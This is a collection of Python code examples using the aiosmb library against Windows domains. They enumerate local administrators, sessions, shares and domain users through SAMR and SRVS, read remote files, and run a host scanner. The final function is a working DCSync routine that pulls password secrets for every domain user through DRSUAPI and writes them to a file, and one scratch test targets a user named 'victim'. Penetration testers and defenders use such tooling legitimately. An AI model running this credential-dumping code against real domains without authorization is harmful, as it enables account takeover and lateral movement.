Esempio n. 1
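async def list_localgroup_members(connection_string, groupname = 'Administrators', out_file = None, json_out = False):
	"""List the member SIDs of a local (Builtin) alias via SAMR and print them.

	Args:
		connection_string: aiosmb connection string parsed by SMBTarget and SMBCredential.
		groupname: name of the Builtin alias to enumerate (default 'Administrators').
		out_file: accepted for interface compatibility; not used by this function.
		json_out: accepted for interface compatibility; not used by this function.

	Raises:
		Exception: if the SAMR connection fails, the Builtin domain is missing,
			or no alias named *groupname* exists in it.
	"""
	target = SMBTarget.from_connection_string(connection_string)
	credential = SMBCredential.from_connection_string(connection_string)
	spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

	async with SMBConnection(spneg, target) as connection:
		await connection.login()

		async with SMBSAMR(connection) as samr:
			logging.debug('Connecting to SAMR')
			try:
				await samr.connect()
			except Exception:
				# A failed connect used to be logged and then ignored, which only
				# moved the failure to the first SAMR call below; fail here instead.
				logging.exception('Failed to connect to SAMR')
				raise

			# Local aliases live in the 'Builtin' domain; make sure it is present.
			found = False
			async for domain in samr.list_domains():
				if domain == 'Builtin':
					found = True
					logging.info('[+] Found Builtin domain')
					break

			if not found:
				raise Exception('[-] Could not find Builtin domain. Fail.')

			domain_sid = await samr.get_domain_sid('Builtin')
			domain_handle = await samr.open_domain(domain_sid)

			# Resolve the alias name to its RID.
			target_rid = None
			async for name, rid in samr.list_aliases(domain_handle):
				if name == groupname:
					target_rid = rid
					logging.info('[+] Found %s group!' % name)
					break

			if target_rid is None:
				# The original message formatted the loop variable 'name' (the last
				# alias seen, or unbound when there were none) instead of the target.
				raise Exception('[-] %s group not found! Fail.' % groupname)

			alias_handle = await samr.open_alias(domain_handle, target_rid)
			async for sid in samr.list_alias_members(alias_handle):
				print(sid)

	print('Done!')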
Esempio n. 2
async def read_file(connection_string, filename):
	"""Open *filename* on the SMB target and print its contents.

	Target and credential are both parsed from *connection_string*; the file
	is read in full and written to stdout exactly as the reader returns it.
	"""
	smb_target = SMBTarget.from_connection_string(connection_string)
	smb_cred = SMBCredential.from_connection_string(connection_string)
	spnego_cred = AuthenticatorBuilder.to_spnego_cred(smb_cred, smb_target)

	async with SMBConnection(spnego_cred, smb_target) as conn:
		await conn.login()
		async with SMBFileReader(conn) as file_reader:
			await file_reader.open(filename)
			contents = await file_reader.read()
			print(contents)
Esempio n. 3
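async def filereader_test(connection_string, filename):
    """Scratch test: log in, then open a DRSUAPI session against 'TEST.corp'.

    Any failure is reported as a traceback plus a one-line error message and
    the function returns normally. *filename* is accepted for interface
    compatibility but is not used. Everything that followed the first
    ``return`` in the earlier version (registry hive save, share and
    workstation-user enumeration) was unreachable and has been dropped.
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)

    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()

        try:
            t = SMBDRSUAPI(connection, 'TEST.corp')
            await t.connect()
            await t.open()
            # Was input(...), which blocks a non-interactive run waiting for Enter.
            print('open succsess!')
            await t.get_user_secrets('victim')
        except Exception as e:
            import traceback
            traceback.print_exc()
            print('Error! %s' % e)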
Esempio n. 4
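async def list_sessions(connection_string, filename = None, json_out = False):
	"""Enumerate the sessions reported by the SRVS service and print each one.

	Args:
		connection_string: aiosmb connection string parsed by SMBTarget and SMBCredential.
		filename: accepted for interface compatibility; not used by this function.
		json_out: accepted for interface compatibility; not used by this function.

	Raises:
		Exception: if the SRVS connection cannot be established.
	"""
	target = SMBTarget.from_connection_string(connection_string)
	credential = SMBCredential.from_connection_string(connection_string)
	spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

	async with SMBConnection(spneg, target) as connection:
		await connection.login()

		async with SMBSRVS(connection) as srvs:
			# The earlier messages said 'SAMR' (copied from the SAMR helper);
			# this function talks to SRVS.
			logging.debug('Connecting to SRVS')
			try:
				await srvs.connect()
			except Exception:
				# Continuing after a failed connect only deferred the error to
				# list_sessions(); surface it here.
				logging.exception('Failed to connect to SRVS')
				raise

			async for username, ip_addr in srvs.list_sessions():
				print(username, ip_addr)

	print('Done!')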
Esempio n. 5
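async def filereader_test(connection_string, filename):
    """Scratch test: log in and print every share the SRVS service reports.

    A failed login is printed and then re-raised. *filename* is accepted for
    interface compatibility but is not used.
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)

    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:

        try:
            await connection.login()
        except Exception as e:
            print(str(e))
            # Bare raise keeps the original traceback intact.
            raise
        print(connection)
        # Use the async context manager so the SRVS binding is released on exit;
        # the earlier version constructed SMBSRVS directly and never closed it.
        async with SMBSRVS(connection) as srvs:
            await srvs.connect()

            async for name, share_type, remark in srvs.list_shares():
                print(name, share_type, remark)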
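async def filereader_test(connection_string, filename):
    """Scratch test: walk the SAMR object hierarchy of domain 'TEST' and print it.

    Prints the domain list, the 'TEST' domain SID and handle, its users and
    groups, the group memberships of the user with RID 1106, and finally the
    members of the Builtin alias with RID 544 (the well-known Administrators
    alias). The domain name and RIDs are hard-coded test values. *filename*
    is accepted for interface compatibility but is not used.
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)

    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()

        # Async context manager so the SAMR binding is released on exit; the
        # earlier version constructed SMBSAMR directly and never closed it.
        async with SMBSAMR(connection) as samr:
            await samr.connect()
            async for domain in samr.list_domains():
                print('domain: %s' % domain)

            domain_sid = await samr.get_domain_sid('TEST')
            print(str(domain_sid))
            domain_handle = await samr.open_domain(domain_sid)
            print(domain_handle)

            async for username in samr.list_domain_users(domain_handle):
                print(username)

            async for groupname in samr.list_domain_groups(domain_handle):
                print(groupname)

            async for sid, username in samr.enumerate_users(domain_handle):
                print(username, sid)

            user_handle = await samr.open_user(domain_handle, 1106)
            # Was input(user_handle): that blocks a non-interactive run waiting for Enter.
            print(user_handle)
            async for sid in samr.get_user_group_memberships(user_handle):
                print(sid)

            # Members of the Builtin alias with RID 544; a separate handle is
            # used so the 'TEST' domain handle above is not silently replaced.
            local_domain_sid = await samr.get_domain_sid('Builtin')
            builtin_handle = await samr.open_domain(local_domain_sid)
            alias_handle = await samr.open_alias(builtin_handle, 544)
            async for sid in samr.list_alias_members(alias_handle):
                print(sid)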
async def filereader_test(connection_string, filename):
    """Scratch test: run SMBHostScanner on the connection and print each queued result.

    No login is performed on the connection before the scanner runs.
    *filename* is accepted for interface compatibility but is not used.
    The consumer loop has no exit condition: if the scanner stops producing,
    the awaited ``get()`` never returns and this coroutine never completes.
    """
    smb_target = SMBTarget.from_connection_string(connection_string)
    smb_cred = SMBCredential.from_connection_string(connection_string)
    spnego_cred = AuthenticatorBuilder.to_spnego_cred(smb_cred, smb_target)

    async with SMBConnection(spnego_cred, smb_target) as conn:
        scan_results = asyncio.Queue()
        scanner = SMBHostScanner(conn, results_queue=scan_results)
        await scanner.run()

        while True:
            item = await scan_results.get()
            print(type(item))
            print(item)
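async def dcsync(connection_string,
                 filename=None,
                 target_domain=None,
                 target_users=None,
                 json_out=False):
    """Fetch user secrets through DRSUAPI and print them or write them to a file.

    Args:
        connection_string: aiosmb connection string parsed by SMBTarget and SMBCredential.
        filename: when given, records are written to this file instead of stdout.
        target_domain: domain to query; when None, the first domain SAMR lists is used.
        target_users: user names to fetch; when empty or None, every user that SAMR
            lists for the domain is fetched.
        json_out: when writing to *filename*, emit ``json.dumps(secrets.to_dict())``
            per record (one per line) instead of ``str(secrets)``. Ignored when
            printing to stdout, as before.

    Raises:
        Exception: propagated when the SAMR or DRSUAPI connection fails.
    """
    # The default used to be a shared mutable list; normalise to a fresh list here.
    target_users = list(target_users) if target_users else []

    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()

        async with SMBSAMR(connection) as samr:
            logging.debug('Connecting to SAMR')
            try:
                await samr.connect()
            except Exception:
                # The earlier handler called a misspelled 'loggign' name, so a
                # connect failure raised NameError instead of being reported.
                logging.exception('Failed to connect to SAMR')
                raise

            if target_domain is None:
                logging.debug('No domain defined, fetching it from SAMR')

                logging.debug('Fetching domains...')
                async for domain in samr.list_domains():
                    if target_domain is None:  # use the first available
                        target_domain = domain
                    logging.debug('Domain available: %s' % domain)

            logging.debug('Using domain: %s' % target_domain)
            async with SMBDRSUAPI(connection, target_domain) as drsuapi:
                try:
                    await drsuapi.connect()
                    await drsuapi.open()
                except Exception:
                    # Previously swallowed by a bare except, leaving a half-open
                    # DRSUAPI object to fail on the first get_user_secrets call.
                    logging.exception('Failed to connect to DRSUAPI!')
                    raise

                if target_users:
                    usernames = _names_from_list(target_users)
                else:
                    domain_sid = await samr.get_domain_sid(target_domain)
                    domain_handle = await samr.open_domain(domain_sid)
                    usernames = _names_from_samr(samr, domain_handle)

                if filename is not None:
                    with open(filename, 'w') as f:
                        async for username in usernames:
                            secrets = await drsuapi.get_user_secrets(username)
                            f.write(_format_secrets(secrets, json_out))
                else:
                    async for username in usernames:
                        secrets = await drsuapi.get_user_secrets(username)
                        print(str(secrets))

    print('Done!')


async def _names_from_list(names):
    """Yield the given user names as an async iterator (matches _names_from_samr)."""
    for name in names:
        yield name


async def _names_from_samr(samr, domain_handle):
    """Yield every user name that SAMR lists for *domain_handle*; the SID is not needed here."""
    async for username, user_sid in samr.list_domain_users(domain_handle):
        yield username


def _format_secrets(secrets, json_out):
    """Return the file representation of one record.

    JSON records get a CRLF terminator so that consecutive records stay
    parseable one per line (the earlier per-user JSON branch omitted it);
    the text form is written as ``str(secrets)`` unchanged.
    """
    if json_out:
        return json.dumps(secrets.to_dict()) + '\r\n'
    return str(secrets)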